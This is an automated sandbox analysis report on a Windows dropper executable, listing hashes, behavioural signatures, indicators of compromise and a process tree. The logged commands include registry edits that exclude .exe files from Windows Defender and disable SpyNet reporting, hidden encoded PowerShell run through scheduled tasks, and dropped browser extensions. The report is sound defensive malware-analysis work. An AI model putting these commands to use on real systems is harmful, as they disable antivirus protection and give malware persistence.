Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
22/11/2023, 09:21
Static task
static1
General
-
Target
72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c.exe
-
Size
7.2MB
-
MD5
249425f4452cf71c3101c81e559b803f
-
SHA1
e820e17911dbce1aa203eaeedfe9fdce15105c84
-
SHA256
72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c
-
SHA512
8effba68743239bcd945dd022391a4a4881633b293016c5e415d587b8902fdab7148f2cf7aa5dc3dc66082ae1f2799bd0c2f118b3a072dbaa3b0a92b33b3e6b6
-
SSDEEP
196608:91OtFl1RstMWgb87vPICWVOR2RluEiz8laztsImYEK78ujZ0g:3OtFlXgMR87H5dBEi4laztNmYE28M
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 86 4860 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation VhpOyAw.exe -
Executes dropped EXE 4 IoCs
pid Process 3172 Install.exe 1640 Install.exe 2332 LtjCWwC.exe 4780 VhpOyAw.exe -
Loads dropped DLL 1 IoCs
pid Process 4860 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json VhpOyAw.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json VhpOyAw.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini VhpOyAw.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B VhpOyAw.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol LtjCWwC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B VhpOyAw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VhpOyAw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini LtjCWwC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 VhpOyAw.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F VhpOyAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VhpOyAw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja VhpOyAw.exe File created C:\Program Files (x86)\KcvIfpBEU\iLdHFDc.xml VhpOyAw.exe File created C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\ClevaNC.xml VhpOyAw.exe File created C:\Program Files (x86)\OFVgegHnELnCC\AsypWEM.dll VhpOyAw.exe File created C:\Program Files (x86)\KLjJYzCUqgUn\CBeLVjm.dll VhpOyAw.exe File created C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\KNklaZg.dll VhpOyAw.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi VhpOyAw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi VhpOyAw.exe File created C:\Program Files (x86)\AtBFliYUSCIU2\NsTdapB.xml VhpOyAw.exe File created C:\Program Files (x86)\KcvIfpBEU\noWpkS.dll VhpOyAw.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VhpOyAw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VhpOyAw.exe File created C:\Program Files (x86)\AtBFliYUSCIU2\onboJWzpykLSo.dll VhpOyAw.exe File created C:\Program Files (x86)\OFVgegHnELnCC\hnFUuek.xml VhpOyAw.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\tPKRaMnTrSPPzpw.job schtasks.exe File created C:\Windows\Tasks\GZVqxQnXgrdNzWCPM.job schtasks.exe File created C:\Windows\Tasks\bSTfouYtWkypYZNMeg.job schtasks.exe File created C:\Windows\Tasks\AtBWxWZQPczPtNlnn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2980 schtasks.exe 3704 schtasks.exe 4128 schtasks.exe 1280 schtasks.exe 4428 schtasks.exe 4108 schtasks.exe 4652 schtasks.exe 2440 schtasks.exe 2200 schtasks.exe 3484 schtasks.exe 1268 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" VhpOyAw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{66c809e9-0000-0000-0000-d01200000000}\MaxCapacity = "14116" VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{66c809e9-0000-0000-0000-d01200000000}\NukeOnDelete = "0" VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2" VhpOyAw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume VhpOyAw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4632 powershell.EXE 4632 powershell.EXE 4556 powershell.exe 4556 powershell.exe 4108 powershell.exe 4108 powershell.exe 700 powershell.EXE 700 powershell.EXE 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe 4780 VhpOyAw.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4632 powershell.EXE Token: SeDebugPrivilege 4556 powershell.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeDebugPrivilege 700 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3668 wrote to memory of 3172 3668 72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c.exe 88 PID 3668 wrote to memory of 3172 3668 72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c.exe 88 PID 3668 wrote to memory of 3172 3668 72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c.exe 88 PID 3172 wrote to memory of 1640 3172 Install.exe 89 PID 3172 wrote to memory of 1640 3172 Install.exe 89 PID 3172 wrote to memory of 1640 3172 Install.exe 89 PID 1640 wrote to memory of 3692 1640 Install.exe 93 PID 1640 wrote to memory of 3692 1640 Install.exe 93 PID 1640 wrote to memory of 3692 1640 Install.exe 93 PID 1640 wrote to memory of 4412 1640 Install.exe 95 PID 1640 wrote to memory of 4412 1640 Install.exe 95 PID 1640 wrote to memory of 4412 1640 Install.exe 95 PID 3692 wrote to memory of 2312 3692 forfiles.exe 97 PID 3692 wrote to memory of 2312 3692 forfiles.exe 97 PID 3692 wrote to memory of 2312 3692 forfiles.exe 97 PID 4412 wrote to memory of 4452 4412 forfiles.exe 98 PID 4412 wrote to memory of 4452 4412 forfiles.exe 98 PID 4412 wrote to memory of 4452 4412 forfiles.exe 98 PID 2312 wrote to memory of 1756 2312 cmd.exe 99 PID 2312 wrote to memory of 1756 2312 cmd.exe 99 PID 2312 wrote to memory of 1756 2312 cmd.exe 99 PID 4452 wrote to memory of 3744 4452 cmd.exe 100 PID 4452 wrote to memory of 3744 4452 cmd.exe 100 PID 4452 wrote to memory of 3744 4452 cmd.exe 100 PID 2312 wrote to memory of 4996 2312 cmd.exe 101 PID 2312 wrote to memory of 4996 2312 cmd.exe 101 PID 2312 wrote to memory of 4996 2312 cmd.exe 101 PID 4452 wrote to memory of 2196 4452 cmd.exe 102 PID 4452 wrote to memory of 2196 4452 cmd.exe 102 PID 4452 wrote to memory of 2196 4452 cmd.exe 102 PID 1640 wrote to memory of 4652 1640 Install.exe 104 PID 1640 wrote to memory of 4652 1640 Install.exe 104 PID 1640 wrote to memory of 4652 1640 Install.exe 104 PID 1640 wrote to memory of 3836 1640 Install.exe 106 PID 1640 wrote to memory of 3836 1640 Install.exe 106 PID 1640 wrote to memory of 3836 1640 Install.exe 106 PID 4632 wrote to memory of 3352 4632 powershell.EXE 111 PID 4632 wrote to memory of 3352 4632 powershell.EXE 111 PID 1640 wrote to memory of 1072 1640 Install.exe 118 PID 1640 wrote to memory of 1072 1640 Install.exe 118 PID 1640 wrote to memory of 1072 1640 Install.exe 118 PID 1640 wrote to memory of 2440 1640 Install.exe 120 PID 1640 wrote to memory of 2440 1640 Install.exe 120 PID 1640 wrote to memory of 2440 1640 Install.exe 120 PID 2332 wrote to memory of 4556 2332 LtjCWwC.exe 131 PID 2332 wrote to memory of 4556 2332 LtjCWwC.exe 131 PID 2332 wrote to memory of 4556 2332 LtjCWwC.exe 131 PID 4556 wrote to memory of 4952 4556 powershell.exe 133 PID 4556 wrote to memory of 4952 4556 powershell.exe 133 PID 4556 wrote to memory of 4952 4556 powershell.exe 133 PID 4952 wrote to memory of 2312 4952 cmd.exe 134 PID 4952 wrote to memory of 2312 4952 cmd.exe 134 PID 4952 wrote to memory of 2312 4952 cmd.exe 134 PID 4556 wrote to memory of 5100 4556 powershell.exe 135 PID 4556 wrote to memory of 5100 4556 powershell.exe 135 PID 4556 wrote to memory of 5100 4556 powershell.exe 135 PID 4556 wrote to memory of 4704 4556 powershell.exe 136 PID 4556 wrote to memory of 4704 4556 powershell.exe 136 PID 4556 wrote to memory of 4704 4556 powershell.exe 136 PID 4556 wrote to memory of 496 4556 powershell.exe 137 PID 4556 wrote to memory of 496 4556 powershell.exe 137 PID 4556 wrote to memory of 496 4556 powershell.exe 137 PID 4556 wrote to memory of 4340 4556 powershell.exe 138 PID 4556 wrote to memory of 4340 4556 powershell.exe 138
Processes
-
C:\Users\Admin\AppData\Local\Temp\72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c.exe"C:\Users\Admin\AppData\Local\Temp\72425ef7bd30e620033ad02b07c914bdcbe63d612729a9473b07b75e8c9fd83c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\7zS7251.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\7zS74C2.tmp\Install.exe.\Install.exe /APRdidodkk "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1756
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4996
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3744
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2196
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOWkWsgLM" /SC once /ST 05:31:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOWkWsgLM"4⤵PID:3836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOWkWsgLM"4⤵PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 09:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\LtjCWwC.exe\" rd /jcsite_idEBV 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2440
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3352
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1516
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4080
-
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\LtjCWwC.exeC:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\LtjCWwC.exe rd /jcsite_idEBV 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
